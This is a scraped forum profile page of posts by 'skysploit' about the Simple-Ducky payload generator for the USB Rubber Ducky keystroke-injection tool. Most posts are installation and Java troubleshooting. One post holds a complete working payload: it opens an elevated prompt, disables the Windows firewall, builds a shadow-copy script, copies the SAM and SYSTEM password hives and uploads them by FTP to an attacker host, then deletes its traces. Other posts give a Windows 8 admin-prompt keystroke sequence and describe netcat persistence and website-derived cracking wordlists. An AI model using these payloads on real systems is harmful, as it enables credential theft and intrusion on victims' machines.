skysploit
-
Posts
68 -
Joined
-
Last visited
-
Days Won
5
Posts posted by skysploit
-
-
I just recently changed my screen resolution to a higher ratio. I am now receiving the following error:
"resize: Time out occurred"
I can stop the process then highlight my blank konsole window to reveal that the main menu was generated.
Though I can only do so once I have used ^C. I have tried using different color profiles for konsole but to
no avail. Any ideas?
This is certainly a new issue... What version of the simple ducky are you using?
~skysploit
-
Hey guys,
anyone else getting the message:
"bash: simple-ducky: command not found"
The script seems to be running good and installs without issues as far as I can tell. It says to press any key to continue, so I do. After that, when I type simple-ducky as a command, it gives me the above message.
I read through the entire post and no one had this same issue or I wouldn't be asking.
I'm probably just doing something wrong so any help would be appreciated.
Thank you,
-JCAG
Forgot to mention that I am doing this on Kali Linux using their Raspberry Pi image.
Hope that helps!
It seems like the symbolic link didnt take...
Try running this command:
ln -s /usr/share/ducky/encoder/simple-ducky.sh /usr/bin/simple-ducky
Let me know if this works. I have not tried the R-Pi, so I am interested to see how the simple-ducky holds up... On a side note I have a new version that I'm finalizing now that has a much more detailed installer. It should be up by this time tomorrow (fingers crossed).
~skysploit
-
Here's the VSSown payload rebuilt... Instead of downloading VSSOwn, this payload builds a modified version of the vbs file (only the needed parts).. It runs the "/create c" five times. The reason for this is because each operating system typically already has 2-3 shadow copies and we want a new shadow copy with the current hashes. In addition to pulling the SAM & SYSTEM files, this payload drops the firewall and sends the files to a remote FTP server. Sending these files via FTP (in the clear) on a pentest will likely get you sued, this is just an example on how to extract the data... This payload runs on Windows 7 w/UAC enabled. This payload will be added to the simple-ducky in the next update.
DELAY 2000 ESCAPE DELAY 600 CONTROL ESCAPE DELAY 600 STRING cmd DELAY 600 MENU DELAY 600 STRING a DELAY 700 LEFTARROW DELAY 400 ENTER DELAY 800 STRING cd %USERPROFILE% ENTER STRING netsh firewall set opmode disable ENTER DELAY 300 STRING copy con vssown.vbs ENTER STRING Set args = WScript.Arguments ENTER STRING strComputer = "." ENTER STRING Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") ENTER STRING Select Case args.Item(0) ENTER STRING Case "/start" ENTER STRING Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'") ENTER STRING For Each objService in colListOfServices ENTER STRING objService.StartService() ENTER STRING Wscript.Echo "[*] Signal sent to start the " & objService.Name & " service." ENTER STRING Next ENTER STRING wscript.Quit(0) ENTER STRING Case "/stop" ENTER STRING Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'") ENTER STRING For Each objService in colListOfServices ENTER STRING objService.StopService() ENTER STRING Wscript.Echo "[*] Signal sent to stop the " & objService.Name & " service." ENTER STRING Next ENTER STRING wscript.Quit(0) ENTER STRING Case "/create" ENTER STRING VOLUME = args.Item(1) & ":\" ENTER STRING Const CONTEXT = "ClientAccessible" ENTER STRING Set objShadowStorage = objWMIService.Get("Win32_ShadowCopy") ENTER STRING Wscript.Echo "[*] Attempting to create a shadow copy." ENTER STRING errResult = objShadowStorage.Create(VOLUME, CONTEXT, strShadowID) ENTER STRING wscript.Quit(errResult) ENTER STRING End Select ENTER CTRL z ENTER STRING cscript vssown.vbs /start ENTER STRING cscript vssown.vbs /create c ENTER STRING cscript vssown.vbs /create c ENTER STRING cscript vssown.vbs /create c ENTER STRING cscript vssown.vbs /create c ENTER STRING cscript vssown.vbs /create c ENTER STRING copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\system32\config\SYSTEM . ENTER DELAY 1000 STRING copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\system32\config\SAM . ENTER DELAY 1000 STRING cscript vssown.vbs /stop ENTER DELAY 800 STRING ftp ENTER DELAY 500 STRING open 192.168.10.109 ENTER DELAY 800 STRING hacker ENTER DELAY 1000 STRING hacker ENTER DELAY 1000 STRING bin ENTER DELAY 800 STRING put SAM ENTER DELAY 800 STRING put SYSTEM ENTER DELAY 800 STRING quit ENTER DELAY 200 STRING DEL SAM ENTER STRING DEL SYSTEM ENTER STRING DEL vssown.vbs ENTER STRING exit ENTER~skysploit
-
hmmm.... Man that is something that i have not seen.... Hit me up on private chat and send me the results of: java -version
~skysploit
-
I get the following error on all payloads that I try to generate on Kali 1.0.3 VM (I have already updated 64 bit java)
Exception in thread "main" java.lang.UnsupportedClassVersionError: Encoder : Unsupported major.minor version 51.0
at java.lang.ClassLoader.defineClass1(Native Method)
at java.lang.ClassLoader.defineClass(ClassLoader.java:634)
at java.security.SecureClassLoader.defineClass(SecureClassLoader.java:142)
at java.net.URLClassLoader.defineClass(URLClassLoader.java:277)
at java.net.URLClassLoader.access$000(URLClassLoader.java:73)
at java.net.URLClassLoader$1.run(URLClassLoader.java:212)
at java.security.AccessController.doPrivileged(Native Method)
at java.net.URLClassLoader.findClass(URLClassLoader.java:205)
at java.lang.ClassLoader.loadClass(ClassLoader.java:321)
at sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:294)
at java.lang.ClassLoader.loadClass(ClassLoader.java:266)
Could not find the main class: Encoder. Program will exit.
The end result is that no inject.bin file is ever created. The payload.txt file is created; but I cannot manually from terminal use encoder to convert that to the inject.bin either. Kali linux has the pae kernel and should be considered 64 bit right? When I updated java should I have selected 32 bit? Could that be the cause of my grief?
UPDATE: Just tried this all out in BT5r3 with the other linux installer and I am getting the exact same error. I know it is 32 bit and I used the 32 bit java update option. I am not even getting the payload.txt generated in the ducky folder in BT5r3. Also, when installing dependencies it downloaded the latest 64 bit metasploit installer; but MSF is already installed and fully updated. Should I bother running this installer? I fear it will bork up my MSF install. Thanks for all who respond! :)
With Backtrack, you should be fine using the Kali install (I don't advertise that because Offensive Security is trying to move folks off of Backtrack)... You don't need to install the dependencies for Backtrack as it has all the necessary software. The "other-linux" install is designed for ubuntu/linux mint etc...
try running this command again...
update-alternatives --config java
When prompted select this option... It may not be at number two if you have run the install multiple times.
/usr/lib/jvm/jdk1.7.0_17/jre/bin/java
So with the i386 (Linux kali 3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali6 i686 GNU/Linux) version you should be running the 32bit jdk update....
~skysploit
-
Here's a link to the actual VSSOwn: http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs
Here's LANMaster53's site: http://lanmaster53.com/
-
That you for the response! Please forgive my ignorrance; but I still do not know exactly how to accomplish this, or even if it is the real issue. Will simply running these commands is sequencial order resolve this issue?
Here's a break down (line by line) of everything that the Update JDK option in the Simple-Ducky does .
For the i386 version on Kali-Linux use this (PAY CLOSE ATTENTION TO # 5)...
1. Download JDK v7 from the Oracle website. root@kali:~# wget --no-cookies --header "Cookie: gpw_e24=http%3A%2F%2Fwww.oracle.com" "http://download.oracle.com/otn-pub/java/jdk/7/jdk-7-linux-i586.tar.gz" 2. Extract the tar.gz root@kali:~# tar zxvf jdk-7-linux-i586.tar.gz 3. Move jdk1.7.0 to the /usr/lib/jvm directory root@kali:~# mv jdk1.7.0 /usr/lib/jvm 4. Now we have to setup our system to refer to our new jdk root@kali:~# update-alternatives --install /usr/bin/java java /usr/lib/jvm/jdk1.7.0/jre/bin/java 2 5. Apply the update (Note: YOU MUST SELECT OPTION 2 MANUALLY WHEN PROMPTED!) root@kali:~# update-alternatives --config java 6. Verify the version of JDK that you are using root@kali:~# java -version java version "1.7.0_03" <----(You should see something like this) 7. Remove the downloaded tar.gz file root@kali:~# rm jdk-7-linux-i586.tar.gz
For the amd64 version on Kali-Linux use this (PAY CLOSE ATTENTION TO # 5)...
1. Download JDK v7 from the Oracle website. root@kali:~# wget --no-cookies --header "Cookie: gpw_e24=http%3A%2F%2Fwww.oracle.com" "http://download.oracle.com/otn-pub/java/jdk/7u17-b02/jdk-7u17-linux-x64.tar.gz" 2. Extract the tar.gz root@kali:~# tar zxvf jdk-7u17-linux-x64.tar.gz 3. Move jdk1.7.0 to the /usr/lib/jvm directory root@kali:~# mv jdk1.7.0_17/ /usr/lib/jvm 4.Now we have to setup our system to refer to our new jdk root@kali:~# update-alternatives --install /usr/bin/java java /usr/lib/jvm/jdk1.7.0_17/jre/bin/java 2 5. Apply the update (Note: YOU MUST SELECT OPTION 2 MANUALLY WHEN PROMPTED!) root@kali:~# update-alternatives --config java 6. Verify the version of JDK that you are using root@kali:~# java -version java version "1.7.0_03" <----(You should see something like this) 7. Remove the downloaded tar.gz file root@kali:~# rm jdk-7u17-linux-x64.tar.gz
I hope this helps man...
~skysploit
-
I just posted and verified a new install_v1.0.9.sh script on the Google code page. Here's the link: https://code.google.com/p/simple-ducky-payload-generator/downloads/detail?name=simple-ducky-v1.0.9-kali-edition.tar.gz&can=2&q= The new script fixes the "./install v1.0.9.sh: /bin/bash^M: bad interpreter:" error.
~skysploit
-
I just tried the install script, and I am getting the same errors. Some how the file got damaged. I will up load a new version of the script this evening. In the meantime running these lines will install/update your simple ducky install to version 1.0.9.
root@kali:~# wget http://simple-ducky-payload-generator.googlecode.com/files/simple-ducky-v1.0.9-kali-edition.tar.gz root@kali:~# tar zxvf simple-ducky-v1.0.9-kali-edition.tar.gz -C /usr/share root@kali:~# ln -s /usr/share/ducky/encoder/simple-ducky.sh /usr/bin/simple-ducky root@kali:~# rm simple-ducky-v1.0.9-kali-edition.tar.gz
~skysploit
-
The Ducky registers as a HID device... The SD card just stores key strokes. With that said, the user will definitely see the commands given to open a command prompted. Check out episode 1408.1 & 1408.2 for a good demonstration of how the Ducky works.
Side note: You can run a simple Powershell, Download, and Execute payload and it will take just a couple of seconds to complete.
-
How awesome is this... Great job kmichael500! The USB Rubber Ducky just gets better everyday.
~skysploit
-
Are you able to login to your server? You can remove group, account, and all the other configuration settings by running the folllowing...
root@kali:~# pure-pw userdel <username> root@kali:~# userdel ftpuser root@kali:~# groupdel ftpgroup root@kali:~# rm /etc/pure-ftpd/auth/60pdb root@kali:~# rmdir /ftphome/
Try running it again... Typically for my attacking machines ftp server I use the creds of:
username: hacker
password: hacker
The reason for this is because the commands are going to be run on the victims machine so you don't your everyday account to get comprised or possibly your real name... On another note, I just went back through setup mine up using a 12 character password with uppercase, lowercase, special characters and numbers.I have added this fix to the wiki page: https://code.google.com/p/simple-ducky-payload-generator/w/list
Hope this helps,
~skysploit
-
azren,
Thanks for the feedback. I posted an updated version on the Google code page. If you already have v1.0.6 installed you can just download v1.0.7 and either replace the ducky directory (/usr/share/ducky) with the new one, or run the install.sh script again. It will probably give you an error about the symbolic link, that's ok as it's just letting your know that the symbolic link already exists.
~skysploit
-
Cool, that's good to hear. Strange, but good. If it's in a virtual machine make sure that you are using bridged mode for your network adapter.
-
Hmmm, sorry to hear that you are having issues. We are going to figure this out.... I assume by the screenshot that you are running US key mapping? Are you getting the same results with other payloads? How long of an entry delay are you using?
-
What version of the firmware are you using? If you are willing try flashing your to duckv2.hex. I want to see if we can isolate the problem.
How to flash: https://code.google.com/p/ducky-decode/wiki/Flashing_Guide
duck_v2.hex: https://code.google.com/p/ducky-decode/downloads/detail?name=duck_v2.hex&can=2&q=
thanks,
~skysploit
-
demonjester, I just ran it and can confirm that there are no issues with the payload... Try rebooting the victim machine. The only issue that i can see is that the script is running too fast for the victim machine. You can modify the delays in the conf file by opening /ducky/encoder/payloads/persistenceVIS7nouac.conf with any text editor. Currently this is how all of the vista/7 without UAC payloads open a command prompt. If the consensus is that there needs to be longer delay's I will modify all the conf in the next build which will be available soon.
~skysploit
ESCAPE DELAY 400 CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 MENU DELAY 400 STRING a DELAY 800 ENTER
-
Below is a nice tutorial that Darren did a while back. If you use linux, then check-out this weeks episode (episode 1408) of hak5.
Github Page: https://github.com/hak5darren/USB-Rubber-Ducky/wiki
-
ASCII artist wanted! I'm looking to class up the main menu a little bit. I know there are some talented artists among the Hak5 community. The art should be in bash format, include the titled "Simple-Ducky Payload Generator" and include a duck of some sort. Send your art to skysploit@gmail.com
-
Hak5 crew,
Thanks so much for the shout-out on the show yesterday. The download count for the simple-ducky has gone up drastically in the last 24 hours... I put a new tool request on bugs.kali.org. Lets see if we can get it voted up and make a permanent mark for hak5 in Kali. I have already built a new version (not posted) that places the ducky folder in the /usr/share directory and create a sym link so that all you have to run is "simple-ducky" to start the payload generator.
CaptainHooligan,
Nice man... I will go through to see what I can add from your script in the next version of the simple-ducky.
-
You can also try...
1. Right click "My Computer"
2. Select "Manage"
3. Select "Disk Management"
4. Delete the volume for the SD
5. Create a new volume and format the SD card
-
I would imagine that it would work. However, it would require you to change the way you access the command prompt... Here's what I use to pull up cmd as an admin on Windows 8. Of course you can speed it up if you would like. I have this setup for reliability.
DELAY 5000 GUI q DELAY 400 STRING cmd DELAY 400 MENU DELAY 300 RIGHTARROW DELAY 300 RIGHTARROW DELAY 300 RIGHTARROW DELAY 300 ENTER DELAY 600 ALT y DELAY 800
-
I haven't had any problems with ~Persistence, though it all depends on the network. below is a link to the persistence payload. You can also use the simple-ducky which will generate the payload, setup your webserver, move nc.exe to your web directory and launch a listener for you. All you would have to do is register a no-ip.org page and forward ports 80 and 443 to your attacking machine. And i would assume this would only be used on a legitimate pentest?!?!
Best of luck
http://forums.hak5.org/index.php?/topic/29142-payload-persistence-windows-7-wuac/
-
This is good stuff... Kudos mrgray! Have you guys been getting dinged by Anti-Virus for running this payload?
[Question] Retrieve Sam And System From A Live File System
in Classic USB Rubber Ducky
Posted
Download the latest version of the simple-ducky (v1.1.0): https://code.google.com/p/simple-ducky-payload-generator/downloads/detail?name=installer_v1.1.0_debian.sh&can=2&q=
It has a modified version of this payload which uses 7za to AES256 encrypt the extracted files prior to sending them over ftp. It also has a built in hasher and custom wordlist builder. So say if you are pentesting company X, you can download their website and generate a password list based on every word extracted. You are then prompted with the option to merge the new list with the default list in John.
~skysploit